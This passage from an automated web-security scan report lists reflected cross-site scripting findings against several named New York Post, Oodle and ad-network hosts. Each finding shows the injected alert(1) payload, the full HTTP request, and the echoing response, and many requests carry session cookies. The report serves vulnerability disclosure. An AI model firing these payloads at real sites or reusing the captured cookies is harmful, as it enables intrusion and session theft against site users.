This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /regions/?d5236"-alert(1)-"5fe9f1e64d9=1 HTTP/1.1
Host: jobs.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4NDt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 20:56:18 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwNDk3ODt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14347

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
ing.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-nonclassifieds-_--_--_--_--_--_--_-newdomain";
cmSetProduction();
cmCreatePageviewTag("nonclassifieds regions/?d5236"-alert(1)-"5fe9f1e64d9=1","10000000","","","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-nonclassifieds-_--_--_--_--_--_--_-newdomain");
</script>
...[SNIP]...

1.89. http://jobs.classifieds.nypost.com/regions/new_york/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.classifieds.nypost.com
Path:   /regions/new_york/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16958"><script>alert(1)</script>c33d581e80e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /regions/new_york16958"><script>alert(1)</script>c33d581e80e/ HTTP/1.1
Host: jobs.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4NDt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:56:21 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwNDk4MTt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://jobs.oodle.com/regions/new_york16958"><script>alert(1)</script>c33d581e80e/" />
...[SNIP]...

1.90. http://jobs.classifieds.nypost.com/regions/new_york/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.classifieds.nypost.com
Path:   /regions/new_york/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4a8f"-alert(1)-"015644ae2ea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /regions/new_yorka4a8f"-alert(1)-"015644ae2ea/ HTTP/1.1
Host: jobs.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4NDt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:56:22 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwNDk4Mjt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
eporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-newdomain";
cmSetProduction();
cmCreateErrorTag("nonclassifieds regions/new_yorka4a8f"-alert(1)-"015644ae2ea/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-newdomain");
</script>
...[SNIP]...

1.91. http://jobs.classifieds.nypost.com/regions/new_york/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.classifieds.nypost.com
Path:   /regions/new_york/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d798"-alert(1)-"2f826940928 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /regions/new_york/?8d798"-alert(1)-"2f826940928=1 HTTP/1.1
Host: jobs.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4NDt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 20:56:14 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwNDk3NDt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14202

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
ExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-nonclassifieds-_--_--_--_--_--_--_-newdomain";
cmSetProduction();
cmCreatePageviewTag("nonclassifieds regions/new_york/?8d798"-alert(1)-"2f826940928=1","10000000","","","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-nonclassifieds-_--_--_--_--_--_--_-newdomain");
</script>
...[SNIP]...

1.92. http://jobs.oodle.com/regions/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.oodle.com
Path:   /regions/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d084a"-alert(1)-"846303a82a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /regions/?d084a"-alert(1)-"846303a82a3=1 HTTP/1.1
Host: jobs.oodle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html; charset=utf-8
Date: Fri, 26 Nov 2010 21:14:00 GMT
Content-Length: 22640
Connection: close
Set-Cookie: otu=d05dbeea59ec9d5c59b2a90002c123c8; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: ots=034e3f6eedc621bd04d46f6b2f3d20cc; path=/; domain=.oodle.com
Set-Cookie: a=dT1EODQwNTlFMDRDRjAyMzE4; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODA2MDQwO30%3D; path=/; domain=.oodle.com
Set-Cookie: loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7czoxNzoidXNhOnR4OmNsdXRjaGNpdHkiO3M6NjoicmFkaXVzIjtpOjUwO3M6NzoiY291bnRyeSI7czozOiJVU0EiO3M6OToicmVnaW9uX2lkIjtzOjI6IjE5Ijt9fQ%3D%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: loc_USA_selected=aTowOw%3D%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
nonclassifieds-_-nonclassifieds-_--_-www-_-USA-_-oodle-_-nonclassifieds-_--multivariate-partner-www_no_sil--_--_--_--_--_--_-newdomain";
cmSetProduction();
cmCreatePageviewTag("nonclassifieds regions/?d084a"-alert(1)-"846303a82a3=1","10000000","","","houston-_-nonclassifieds-_-nonclassifieds-_-www USA-_-www-_-USA-_-oodle-_-nonclassifieds-_--multivariate-partner-www_no_sil--_--_--_--_--_--_-newdomain");
</script>
...[SNIP]...

1.93. http://k.collective-media.net/cmadj/cm.ny_post/tier2_082410 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.ny_post/tier2_082410

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 784c7'-alert(1)-'9a72d164a38 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj784c7'-alert(1)-'9a72d164a38/cm.ny_post/tier2_082410;sz=728x90;net=cm;ord=1290802975;env=ifr;ord1=862042;cmpgurl=http%253A//www.nypost.com/partners/oodle/head_general.htm? HTTP/1.1
Host: k.collective-media.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/14/nypost/728x90/above-fold?t=1290806114778&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.nypost.com%2Fpartners%2Foodle%2Fhead_general.htm&refer=http%3A%2F%2Fwww.classifieds.nypost.com%2Fhousing%2Frent8f319%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E753c6886db6%2Fapartment%2F
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11bbcecf1d09b9d; bkdp=1; gce=1; JY57=3kLv9HAF1oij2HK9QoO88ruPVtS-4jU-0EtAlYwrF4689JWJDCrmEww; apnx=1; nadp=1; qcdp=1; qcms=1; blue=1; dc=dal-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:50:30 GMT
Connection: close
Set-Cookie: targ=1; domain=collective-media.net; path=/; expires=Fri, 03-Dec-2010 20:50:30 GMT
Content-Length: 7452

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-42499110_1290804630","http://ad.doubleclick.net/adj784c7'-alert(1)-'9a72d164a38/cm.ny_post/tier2_082410;net=cm;u=,cm-42499110_1290804630,11bbcecf1d09b9d,biz,cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.biz1-cm.biz_h-cm.sports_h-cm.ent_l-cm.none_h;;cmw=owl;sz=728x90;net=cm;en
...[SNIP]...

1.94. http://k.collective-media.net/cmadj/cm.ny_post/tier2_082410 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.ny_post/tier2_082410

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 24960'-alert(1)-'72eb4f88e56 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.ny_post24960'-alert(1)-'72eb4f88e56/tier2_082410 HTTP/1.1
Host: k.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dal-dc; bkdp=1; blue=1; apnx=1; qcms=1; JY57=3kLv9HAF1oij2HK9QoO88ruPVtS-4jU-0EtAlYwrF4689JWJDCrmEww; cli=11bbcecf1d09b9d; nadp=1; mmpg=1; targ=1; gce=1; qcdp=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7287
Date: Fri, 26 Nov 2010 20:41:27 GMT
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-85432089_1290804087","http://ad.doubleclick.net//cm.ny_post24960'-alert(1)-'72eb4f88e56/tier2_082410;net=cm;u=,cm-85432089_1290804087,11bbcecf1d09b9d,none,cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.biz_l-cm.ent_l-cm.sports_h-cm.none_h;;contx=none;dc=d;btg=cm.sportsreg;btg=cm.sport
...[SNIP]...

1.95. http://k.collective-media.net/cmadj/cm.ny_post/tier2_082410 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.ny_post/tier2_082410

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4317a'-alert(1)-'3cc42b9ee5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.ny_post/tier2_0824104317a'-alert(1)-'3cc42b9ee5 HTTP/1.1
Host: k.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dal-dc; bkdp=1; blue=1; apnx=1; qcms=1; JY57=3kLv9HAF1oij2HK9QoO88ruPVtS-4jU-0EtAlYwrF4689JWJDCrmEww; cli=11bbcecf1d09b9d; nadp=1; mmpg=1; targ=1; gce=1; qcdp=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7286
Date: Fri, 26 Nov 2010 20:41:27 GMT
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-58617865_1290804087","http://ad.doubleclick.net//cm.ny_post/tier2_0824104317a'-alert(1)-'3cc42b9ee5;net=cm;u=,cm-58617865_1290804087,11bbcecf1d09b9d,none,cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.biz_l-cm.ent_l-cm.sports_h-cm.none_h;;contx=none;dc=d;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.c
...[SNIP]...

1.96. http://k.collective-media.net/cmadj/cm.ny_post/tier2_082410 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.ny_post/tier2_082410

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 646e9'-alert(1)-'9979033da62 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.ny_post/tier2_082410?646e9'-alert(1)-'9979033da62=1 HTTP/1.1
Host: k.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dal-dc; bkdp=1; blue=1; apnx=1; qcms=1; JY57=3kLv9HAF1oij2HK9QoO88ruPVtS-4jU-0EtAlYwrF4689JWJDCrmEww; cli=11bbcecf1d09b9d; nadp=1; mmpg=1; targ=1; gce=1; qcdp=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7288
Date: Fri, 26 Nov 2010 20:41:27 GMT
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-7978060_1290804087","http://ad.doubleclick.net//cm.ny_post/tier2_082410?646e9'-alert(1)-'9979033da62=1;net=cm;u=,cm-7978060_1290804087,11bbcecf1d09b9d,none,cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.biz_l-cm.ent_l-cm.sports_h-cm.none_h;;contx=none;dc=d;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.
...[SNIP]...

1.97. http://k.collective-media.net/cmadj/cm.ny_post/tier2_082410 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.ny_post/tier2_082410

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb45a'-alert(1)-'91eecd11ab0 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.ny_post/tier2_082410;sz=bb45a'-alert(1)-'91eecd11ab0 HTTP/1.1
Host: k.collective-media.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/14/nypost/728x90/above-fold?t=1290806114778&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.nypost.com%2Fpartners%2Foodle%2Fhead_general.htm&refer=http%3A%2F%2Fwww.classifieds.nypost.com%2Fhousing%2Frent8f319%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E753c6886db6%2Fapartment%2F
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11bbcecf1d09b9d; bkdp=1; gce=1; JY57=3kLv9HAF1oij2HK9QoO88ruPVtS-4jU-0EtAlYwrF4689JWJDCrmEww; apnx=1; nadp=1; qcdp=1; qcms=1; blue=1; dc=dal-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:50:30 GMT
Connection: close
Content-Length: 7348

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
leclick.net/adj/cm.ny_post/tier2_082410;net=cm;u=,cm-42277532_1290804630,11bbcecf1d09b9d,none,cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.biz1-cm.biz_h-cm.ent_l-cm.sports_h-cm.none_h;;cmw=owl;sz=bb45a'-alert(1)-'91eecd11ab0;contx=none;dc=d;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.cm_aa_gn1;btg=cm.pb8k;btg=cm.biz1;btg=cm.biz_h;btg=cm.ent_l;btg=cm.sports_h;btg=cm.none_h?","bb45a'-alert(1)-'91eecd11ab0","",true);</scr'+'ipt
...[SNIP]...

1.98. http://nypost.newspaperdirect.com/epaper/helpandsupport.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nypost.newspaperdirect.com
Path:   /epaper/helpandsupport.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a253b"style%3d"x%3aexpression(alert(1))"7663e53443 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a253b"style="x:expression(alert(1))"7663e53443 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /epaper/helpandsupport.aspx?a253b"style%3d"x%3aexpression(alert(1))"7663e53443=1 HTTP/1.1
Host: nypost.newspaperdirect.com
Accept: */*
Accept-Language: en
